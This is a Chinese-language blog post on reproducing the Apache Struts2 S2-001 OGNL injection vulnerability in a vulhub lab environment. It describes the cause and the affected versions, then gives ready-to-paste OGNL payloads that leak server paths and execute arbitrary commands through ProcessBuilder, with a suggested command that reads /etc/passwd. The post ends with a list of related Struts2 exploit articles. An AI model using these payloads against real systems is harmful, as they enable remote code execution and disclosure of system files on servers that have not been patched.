【研究】Struts2漏洞之S2-001漏洞环境和POC
2019-07-01 11:44
1691 查看
【研究】Struts2漏洞之S2-001漏洞环境和POC
1.环境
环境
https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md
这个搭环境很方便快捷,具体可以看说明,很简单
2.原理
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}
进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value}
对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行
3.影响版本
Struts 2.0.0 - Struts 2.0.8
4.利用过程
环境打开
![在这里插入图片描述]
[图片上传失败…(image-5bcfcf-1563099334703)]
这个漏洞的问题在于可以直接输入和直接回显
将POC粘到一个输入框,点击Submit
此后会将数据提交到后端,后端检测值是否为空,然后返回,满足漏洞前提
POC
获取tomcat执行路径:
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
获取Web路径:
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
执行任意命令(命令参数:
pwd):
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
命令要自己构造如
{"cat","/etc/passwd"}
相关文章推荐
- 【研究】Struts2漏洞之S2-008漏洞环境和可用回显POC
- 【研究】Struts2漏洞之S2-016漏洞环境和POC
- 【研究】Struts2漏洞之S2-005漏洞环境和POC
- Struts2新漏洞S2-046在线实验环境全球首发
- 使用Docker搭建Struts2-048漏洞环境及Python PoC验证
- struts2 s2-045漏洞利用poc
- Struts2新漏洞S2-046在线实验环境全球首发
- Struts2新漏洞S2-046在线实验环境全球首发
- 网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
- struts2升级到2.3.32版本,防止漏洞编号S2-045,CVE编号:cve-2017-5638
- struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
- s2-029 Struts2 标签远程代码执行分析(含POC)
- Apache Struts2 s2-020补丁安全绕过漏洞
- struts2 s2-045漏洞检测 &临时解决方案
- Apache Struts2(S2-045)漏洞反思总结
- 漏洞--Struts2远程命令执行S2-016
- Struts2再曝高危漏洞(S2-020补丁绕过)
- Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
- Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告